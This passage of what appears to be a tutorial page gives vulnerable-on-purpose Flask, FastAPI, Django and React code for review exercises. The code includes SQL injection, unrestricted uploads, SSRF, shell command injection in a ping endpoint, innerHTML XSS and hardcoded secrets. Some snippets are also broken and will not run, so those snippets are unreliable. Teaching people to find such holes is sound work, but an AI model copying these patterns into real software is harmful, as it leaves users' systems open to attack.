class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="nf">text</span><span class="p">(</span><span class="n">query</span><span class="p">)).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">results.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span class="p">:</span> <span class="n">result</span><span class="p">})</span> </code></pre> </div> <p><strong><code>UserSearch.jsx</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">UserSearch</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">username</span><span class="p">,</span> <span class="nx">setUsername</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">searchUser</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/user?username=</span><span class="p">${</span><span class="nx">username</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">results</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">html</span><span class="p">;</span> <span class="p">};</span> <span class="k">return </span><span class="p">(</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="p">=</span><span class="s">"text"</span> <span class="na">value</span><span class="p">=</span><span class="si">{</span><span class="nx">username</span><span class="si">}</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setUsername</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Enter username"</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">searchUser</span><span class="si">}</span><span class="p">&gt;</span>Search<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">id</span><span class="p">=</span><span class="s">"results"</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p><strong><code>templates/results.html</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;h1&gt;</span>Results<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for row in results %} <span class="nt">&lt;li&gt;</span>{{ row }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> </code></pre> </div> <h2> Exercise 2 — Flask + React </h2> <p><strong>App:</strong> Blog platform with file uploads and profile management</p> <p><strong>Database Schema:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">users</span> <span class="p">(</span> <span class="n">id</span> <span class="nb">INTEGER</span> <span class="k">PRIMARY</span> <span class="k">KEY</span> <span class="n">AUTOINCREMENT</span><span class="p">,</span> <span class="n">username</span> <span class="nb">TEXT</span> <span class="k">UNIQUE</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">password</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">email</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="k">role</span> <span class="nb">TEXT</span> <span class="k">DEFAULT</span> <span class="s1">'user'</span> <span class="p">);</span> <span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">posts</span> <span class="p">(</span> <span class="n">id</span> <span class="nb">INTEGER</span> <span class="k">PRIMARY</span> <span class="k">KEY</span> <span class="n">AUTOINCREMENT</span><span class="p">,</span> <span class="n">title</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">content</span> <span class="nb">TEXT</span><span class="p">,</span> <span class="n">author_id</span> <span class="nb">INTEGER</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="k">FOREIGN</span> <span class="k">KEY</span> <span class="p">(</span><span class="n">author_id</span><span class="p">)</span> <span class="k">REFERENCES</span> <span class="n">users</span><span class="p">(</span><span class="n">id</span><span class="p">)</span> <span class="p">);</span> </code></pre> </div> <p><strong><code>app.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">url_for</span><span class="p">,</span> <span class="n">session</span><span class="p">,</span> <span class="n">flash</span> <span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">from</span> <span class="n">werkzeug.utils</span> <span class="kn">import</span> <span class="n">secure_filename</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">app</span><span class="p">.</span><span class="n">secret_key</span> <span class="o">=</span> <span class="sh">'</span><span class="s">supersecretkey</span><span class="sh">'</span> <span class="n">app</span><span class="p">.</span><span class="n">config</span><span class="p">[</span><span class="sh">'</span><span class="s">UPLOAD_FOLDER</span><span class="sh">'</span><span class="p">]</span> <span class="o">=</span> <span class="sh">'</span><span class="s">uploads</span><span class="sh">'</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/upload</span><span class="sh">'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">])</span> <span class="k">def</span> <span class="nf">upload_file</span><span class="p">():</span> <span class="k">if</span> <span class="sh">'</span><span class="s">file</span><span class="sh">'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">request</span><span class="p">.</span><span class="n">files</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">No file uploaded</span><span class="sh">"</span><span class="p">,</span> <span class="mi">400</span> <span class="nb">file</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">files</span><span class="p">[</span><span class="sh">'</span><span class="s">file</span><span class="sh">'</span><span class="p">]</span> <span class="k">if</span> <span class="nb">file</span><span class="p">.</span><span class="n">filename</span> <span class="o">==</span> <span class="sh">''</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">No file selected</span><span class="sh">"</span><span class="p">,</span> <span class="mi">400</span> <span class="nb">file</span><span class="p">.</span><span class="nf">save</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">app</span><span class="p">.</span><span class="n">config</span><span class="p">[</span><span class="sh">'</span><span class="s">UPLOAD_FOLDER</span><span class="sh">'</span><span class="p">],</span> <span class="nb">file</span><span class="p">.</span><span class="n">filename</span><span class="p">))</span> <span class="k">return</span> <span class="sh">"</span><span class="s">File uploaded successfully!</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/search</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search_posts</span><span class="p">():</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">'</span><span class="s">database.db</span><span class="sh">'</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM posts WHERE title LIKE </span><span class="sh">'</span><span class="s">%</span><span class="si">{</span><span class="n">query</span><span class="si">}</span><span class="s">%</span><span class="sh">'"</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">results.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">results</span><span class="o">=</span><span class="n">results</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/profile</span><span class="sh">'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">])</span> <span class="k">def</span> <span class="nf">update_profile</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">)</span> <span class="n">new_email</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">email</span><span class="sh">'</span><span class="p">]</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">'</span><span class="s">database.db</span><span class="sh">'</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">UPDATE users SET email = </span><span class="sh">'</span><span class="si">{</span><span class="n">new_email</span><span class="si">}</span><span class="sh">'</span><span class="s"> WHERE username = </span><span class="sh">'</span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">'"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">flash</span><span class="p">(</span><span class="sh">'</span><span class="s">Profile updated!</span><span class="sh">'</span><span class="p">)</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="nf">url_for</span><span class="p">(</span><span class="sh">'</span><span class="s">profile</span><span class="sh">'</span><span class="p">))</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">'</span><span class="s">__main__</span><span class="sh">'</span><span class="p">:</span> <span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">debug</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> </code></pre> </div> <p><strong><code>Search.jsx</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Search</span><span class="p">()</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">query</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">handleSearch</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/search?q=</span><span class="p">${</span><span class="nx">query</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">results</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">html</span><span class="p">;</span> <span class="p">};</span> <span class="p">}</span> <span class="k">return </span><span class="p">(</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="p">=</span><span class="s">"text"</span> <span class="na">value</span><span class="p">=</span><span class="si">{</span><span class="nx">query</span><span class="si">}</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setQuery</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Search posts..."</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">handleSearch</span><span class="si">}</span><span class="p">&gt;</span>Search<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">id</span><span class="p">=</span><span class="s">"results"</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Exercise 3 — FastAPI + React </h2> <p><strong>App:</strong> Admin panel with JWT authentication</p> <p><strong><code>app.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span><span class="p">,</span> <span class="n">Form</span><span class="p">,</span> <span class="n">HTTPException</span><span class="p">,</span> <span class="n">status</span><span class="p">,</span> <span class="n">Depends</span> <span class="kn">from</span> <span class="n">fastapi.security</span> <span class="kn">import</span> <span class="n">OAuth2PasswordBearer</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">from</span> <span class="n">jose</span> <span class="kn">import</span> <span class="n">JWTError</span><span class="p">,</span> <span class="n">jwt</span> <span class="kn">from</span> <span class="n">datetime</span> <span class="kn">import</span> <span class="n">datetime</span><span class="p">,</span> <span class="n">timedelta</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">app</span><span class="p">.</span><span class="n">secret_key</span> <span class="o">=</span> <span class="sh">"</span><span class="s">supersecretkey</span><span class="sh">"</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="n">oauth2_scheme</span> <span class="o">=</span> <span class="nc">OAuth2PasswordBearer</span><span class="p">(</span><span class="n">tokenUrl</span><span class="o">=</span><span class="sh">"</span><span class="s">token</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">create_access_token</span><span class="p">(</span><span class="n">data</span><span class="p">:</span> <span class="nb">dict</span><span class="p">):</span> <span class="n">to_encode</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">copy</span><span class="p">()</span> <span class="n">expire</span> <span class="o">=</span> <span class="n">datetime</span><span class="p">.</span><span class="nf">utcnow</span><span class="p">()</span> <span class="o">+</span> <span class="nf">timedelta</span><span class="p">(</span><span class="n">days</span><span class="o">=</span><span class="mi">365</span><span class="p">)</span> <span class="n">to_encode</span><span class="p">.</span><span class="nf">update</span><span class="p">({</span><span class="sh">"</span><span class="s">exp</span><span class="sh">"</span><span class="p">:</span> <span class="n">expire</span><span class="p">})</span> <span class="k">return</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">to_encode</span><span class="p">,</span> <span class="sh">"</span><span class="s">supersecretkey</span><span class="sh">"</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/fetch</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">fetch_url</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">content</span><span class="sh">"</span><span class="p">:</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">username</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Form</span><span class="p">(...),</span> <span class="n">password</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Form</span><span class="p">(...)):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">database.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = </span><span class="sh">'</span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">'</span><span class="s"> AND password = </span><span class="sh">'</span><span class="si">{</span><span class="n">password</span><span class="si">}</span><span class="sh">'"</span><span class="p">)</span> <span class="n">user</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">user</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Invalid credentials</span><span class="sh">"</span><span class="p">)</span> <span class="n">token</span> <span class="o">=</span> <span class="nf">create_access_token</span><span class="p">({</span><span class="sh">"</span><span class="s">sub</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">})</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">access_token</span><span class="sh">"</span><span class="p">:</span> <span class="n">token</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/admin</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">admin_panel</span><span class="p">(</span><span class="n">token</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">oauth2_scheme</span><span class="p">)):</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="sh">"</span><span class="s">supersecretkey</span><span class="sh">"</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">])</span> <span class="n">username</span> <span class="o">=</span> <span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">sub</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">database.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = </span><span class="sh">'</span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">'"</span><span class="p">)</span> <span class="n">user</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">if</span> <span class="n">user</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Admin Panel</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/ping</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">ping_server</span><span class="p">(</span><span class="n">host</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">ping -c 4 </span><span class="si">{</span><span class="n">host</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">output</span><span class="sh">"</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/upload</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">upload_file</span><span class="p">(</span><span class="nb">file</span><span class="p">:</span> <span class="n">UploadFile</span> <span class="o">=</span> <span class="nc">File</span><span class="p">(...)):</span> <span class="nb">file</span><span class="p">.</span><span class="nf">save</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">"</span><span class="s">uploads</span><span class="sh">"</span><span class="p">,</span> <span class="nb">file</span><span class="p">.</span><span class="n">filename</span><span class="p">))</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">File uploaded!</span><span class="sh">"</span><span class="p">}</span> </code></pre> </div> <p><strong><code>Search.jsx</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">react</span><span class="dl">"</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Search</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">url</span><span class="p">,</span> <span class="nx">setUrl</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">""</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">handleFetch</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/fetch?url=</span><span class="p">${</span><span class="nx">url</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">results</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">content</span><span class="p">;</span> <span class="p">};</span> <span class="k">return </span><span class="p">(</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="p">=</span><span class="s">"text"</span> <span class="na">value</span><span class="p">=</span><span class="si">{</span><span class="nx">url</span><span class="si">}</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setUrl</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Enter URL..."</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">handleFetch</span><span class="si">}</span><span class="p">&gt;</span>Fetch<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">id</span><span class="p">=</span><span class="s">"results"</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Exercise 4 — Django + Alpine.js (DevDash) </h2> <p><strong>App:</strong> Developer dashboard with avatar uploads, report search, and DNS diagnostics</p> <p><strong><code>devdash/settings.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="sh">'</span><span class="s">django-insecure-abc123xyz</span><span class="sh">'</span> <span class="n">DEBUG</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">ALLOWED_HOSTS</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">*</span><span class="sh">'</span><span class="p">]</span> <span class="n">INSTALLED_APPS</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">'</span><span class="s">django.contrib.admin</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.auth</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.contenttypes</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.sessions</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.messages</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.staticfiles</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">dashboard</span><span class="sh">'</span><span class="p">,</span> <span class="p">]</span> <span class="n">MIDDLEWARE</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">'</span><span class="s">django.middleware.security.SecurityMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.sessions.middleware.SessionMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.middleware.common.CommonMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.auth.middleware.AuthenticationMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.messages.middleware.MessageMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="p">]</span> </code></pre> </div> <p><strong><code>dashboard/views.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span 